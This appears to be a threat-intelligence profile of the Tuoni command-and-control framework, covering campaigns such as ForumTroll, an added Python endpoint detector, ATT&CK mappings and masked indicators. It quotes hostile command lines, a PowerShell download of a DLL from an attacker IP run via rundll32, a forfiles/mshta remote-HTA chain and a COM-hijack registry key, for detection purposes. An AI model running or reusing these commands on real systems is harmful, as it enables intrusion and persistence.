Tuoni

Tuoni is a command-and-control and red-teaming/post-exploitation framework first released on GitHub in February 2024. Public reporting describes it as a relatively new tool that has been abused in real-world intrusions despite its red-team origin. Observed use focuses on Windows systems, including execution of a Tuoni client via PowerShell download and rundll32, stealthy loading of TuoniAgent.dll, and delivery as the final DLL payload by an OLLVM-obfuscated loader.

Reporting links Tuoni to multiple intrusion chains. In one phishing campaign targeting Russian companies involved in business-process automation software, attackers used malicious archives, LNK files, HTA scripts, and PowerShell; on one infected host they downloaded a Tuoni client from 194.87.252[.]40:9375 and executed it with rundll32. Kaspersky also reported Operation ForumTroll, which used spear-phishing against Russian scholars in political science, international relations, and global economics at major universities and research institutions. That campaign impersonated eLibrary via e-library[.]wiki, delivered personalized ZIP archives containing malicious LNK files, used PowerShell to fetch payloads, established persistence through COM hijacking at HKCR\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32, and ultimately deployed Tuoni as the final payload. ForumTroll infrastructure included fastly.net hosts such as perf-service-clients2.global.ssl.fastly[.]net, bus-pod-tenant.global.ssl.fastly[.]net, and status-portal-api.global.ssl.fastly[.]net.

Morphisec reported threat actors abusing Tuoni in an unsuccessful attack against a major U.S. real estate firm. In that case, the intrusion allegedly began with social engineering that led an employee to run a malicious PowerShell one-liner. The chain then used a concealed PowerShell process, a secondary script with AI-generated comments, BMP downloads, shellcode extraction, inline C# compilation, delegate-based invocation, and reflective in-memory execution to load TuoniAgent.dll. According to that reporting, Tuoni was used with steganography, AI-generated code and comments, and memory-only execution to evade detection, steal credentials, maintain long-term access, and prepare systems for ransomware deployment. Tuoni also appears in network and endpoint detection content, including HTTP C2 framework user-agent analytics and suspicious C2 named-pipe analytics.
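The chains above share a small set of host-observable steps: a PowerShell WebClient.DownloadFile call writing a DLL, rundll32 loading that DLL by export name, forfiles or mshta proxying a script host, and an InProcServer32 value under a CLSID key pointing at a user-writable path. The following detector is an added example written for this page, not code from Mallory or from any of the cited vendors. It assumes a simplified telemetry record (the Event dataclass), uses the technique IDs the page lists plus T1546.015 for COM hijacking, treats paths under Users, AppData, Temp, ProgramData and Public as user-writable, and runs over constructed sample events that mirror the reported commands (the registry DLL path is a hypothetical value).

```python
import re
from dataclasses import dataclass
from ntpath import basename


@dataclass
class Event:
    """One endpoint telemetry record (constructed shape, not a real product schema)."""
    kind: str          # "process" or "registry"
    image: str = ""    # executable path for process events
    cmdline: str = ""
    parent: str = ""   # parent image name
    target: str = ""   # registry key for registry events
    data: str = ""     # value written for registry events


# Heuristic: DLLs served from these locations to rundll32 or a COM key are suspect.
USER_WRITABLE = re.compile(r"(?i)\\(users\\[^\\]+\\|appdata\\|temp\\|programdata\\|public\\)")
DOWNLOAD_RE = re.compile(
    r"(?i)\.downloadfile\(\s*['\"](?P<url>[^'\"]+)['\"]\s*,\s*['\"](?P<dest>[^'\"]+)['\"]")
RUNDLL_RE = re.compile(r"(?i)\brundll32(?:\.exe)?\s+\"?(?P<dll>[^\s\",]+)\"?\s*,\s*(?P<export>[\w#]+)")
INPROC_RE = re.compile(
    r"(?i)^HK(?:CU|CR|U\\[^\\]+)\\(?:Software\\Classes\\)?CLSID\\\{[0-9a-f-]{36}\}\\InProcServer32$")
REMOTE_RE = re.compile(r"(?i)https?://")


def analyze(events):
    """Return (technique_id, message) tuples for events matching the reported patterns."""
    alerts = []
    downloaded = set()  # basenames written by DownloadFile, correlated with later rundll32 loads
    for ev in events:
        if ev.kind == "registry":
            # COM hijack: InProcServer32 under a per-user or merged CLSID hive -> user-writable DLL
            if INPROC_RE.match(ev.target) and USER_WRITABLE.search(ev.data):
                alerts.append(("T1546.015", f"COM hijack: {ev.target} -> {ev.data}"))
            continue
        img = basename(ev.image).lower()
        parent = basename(ev.parent).lower()
        cmd = ev.cmdline
        if img == "forfiles.exe" and re.search(r"(?i)/c\s+\"?\s*(powershell|mshta|cmd)", cmd):
            alerts.append(("T1059.001", f"forfiles.exe proxying a script host: {cmd}"))
        if img == "powershell.exe":
            m = DOWNLOAD_RE.search(cmd)
            if m:
                downloaded.add(basename(m.group("dest")).lower())
                alerts.append(("T1105", f"PowerShell DownloadFile {m.group('url')} -> {m.group('dest')}"))
        if img == "mshta.exe" and REMOTE_RE.search(cmd):
            alerts.append(("T1059.001", f"mshta.exe executing a remote HTA: {cmd}"))
        if img == "rundll32.exe":
            m = RUNDLL_RE.search(cmd)
            if m:
                dll = m.group("dll")
                suspicious = (basename(dll).lower() in downloaded
                              or USER_WRITABLE.search(dll) is not None
                              or parent == "powershell.exe")
                if suspicious:
                    alerts.append(("T1218.011",
                                   f"rundll32 loading {dll} export {m.group('export')} (parent {parent})"))
    return alerts


def sample_events():
    """Constructed telemetry mirroring the reported chains, plus two benign controls."""
    return [
        Event("process", image=r"C:\Windows\System32\forfiles.exe", parent="explorer.exe",
              cmdline=r'forfiles.exe ... /c "powershell ... mshta.exe https://sportsboulevard-shop[.]com/..."'),
        Event("process", image=r"C:\Windows\System32\mshta.exe", parent="powershell.exe",
              cmdline="mshta.exe https://sportsboulevard-shop[.]com/..."),
        Event("process", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              parent="explorer.exe",
              cmdline="powershell.exe -noprofile -command \"(New-Object System.Net.WebClient)"
                      ".DownloadFile('http://194.87.252[.]40:9375/payload?payloadId=59','services.dll')\""),
        Event("process", image=r"C:\Windows\System32\rundll32.exe", parent="powershell.exe",
              cmdline="rundll32.exe services.dll, bob"),
        # Hypothetical DLL path; the CLSID is the one named in the ForumTroll reporting.
        Event("registry", target=r"HKCR\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32",
              data=r"C:\Users\alice\AppData\Roaming\update.dll"),
        Event("process", image=r"C:\Windows\System32\rundll32.exe", parent="explorer.exe",
              cmdline="rundll32.exe shell32.dll,Control_RunDLL"),
        Event("process", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              parent="explorer.exe", cmdline="powershell.exe -command Get-Process"),
    ]


if __name__ == "__main__":
    for technique, message in analyze(sample_events()):
        print(technique, message)
```

The rundll32 rule deliberately combines three signals: the DLL basename matching an earlier DownloadFile destination (the chain reported from 194.87.252[.]40:9375), a user-writable DLL path, or PowerShell as the parent. A bare rundll32 of a system DLL such as shell32.dll from explorer.exe trips none of them, which keeps the rule quiet on ordinary control-panel launches.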


MITRE ATT&CK

Techniques & procedures

12 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access (1 technique)

T1566.003 Spearphishing via Service (evidence count: 1)
  Threat actors suspected of impersonating Microsoft Teams corporate contacts lured an employee to execute a nefarious PowerShell one-liner

Execution (2 techniques)

T1059.001 PowerShell (evidence count: 2)
  forfiles.exe ... /c "powershell ... mshta.exe https://sportsboulevard-shop[.]com/..."; powershell.exe -noprofile -command "(New-Object System.Net.WebClient).DownloadFile(...)"

T1559 Inter-Process Communication (evidence count: 1)
  Source table row: ID T1559, Technique Inter-Process Communication, Tactic Execution

Privilege Escalation (1 technique)

T1055 Process Injection (evidence count: 2)
  eventual in-memory execution of the extracted shellcode

Stealth (4 techniques)

T1027.003 Steganography (evidence count: 1)
  Running the script led to BMP file downloading and eventual in-memory execution of the extracted shellcode

T1055 Process Injection (evidence count: 2)
  eventual in-memory execution of the extracted shellcode

T1218.011 Rundll32 (evidence count: 1)
  rundll32.exe services.dll, bob

T1620 Reflective Code Loading (evidence count: 2)
  resulting in the stealthy loading of TuoniAgent.dll

Lateral Movement (1 technique)

T1021.002 SMB/Windows Admin Shares (evidence count: 1)
  Source table row: ID T1021.002, Technique SMB/Windows Admin Shares, Tactic Lateral Movement

Command and Control (4 techniques)

T1071 Application Layer Protocol (evidence count: 1)
  A new wave of cyberattacks has emerged using the Tuoni C2 framework, a sophisticated tool that allows threat actors to deploy malicious payloads directly into system memory.

T1071.001 Web Protocols (evidence count: 2)
  Source table row: ID T1071.001, Technique Web Protocols, Tactic Command And Control

T1105 Ingress Tool Transfer (evidence count: 1)
  The malicious script downloads and runs two more files... the final malicious payload... Remcos; ... led to the download of the archive file.zip...; ... DownloadFile('http://194.87.252[.]40:9375/payload?payloadId=59','services.dll')

T1219 Remote Access Tools (evidence count: 1)
  Remcos (Remote Control & Surveillance) is malware of the remote access trojan (RAT) class.

INDICATORS OF COMPROMISE

IOCs tracked for this family

3 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network (1 tracked): IPs, domains, and DNS infrastructure linked to this family.

Hashes (1 tracked): File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other (1 tracked): Other indicator types observed in public reporting.

Indicator type and latest sighting (values are masked on the public page):
hash.md5, 2 years ago
ip.v4, 2 years ago
uri, 2 years ago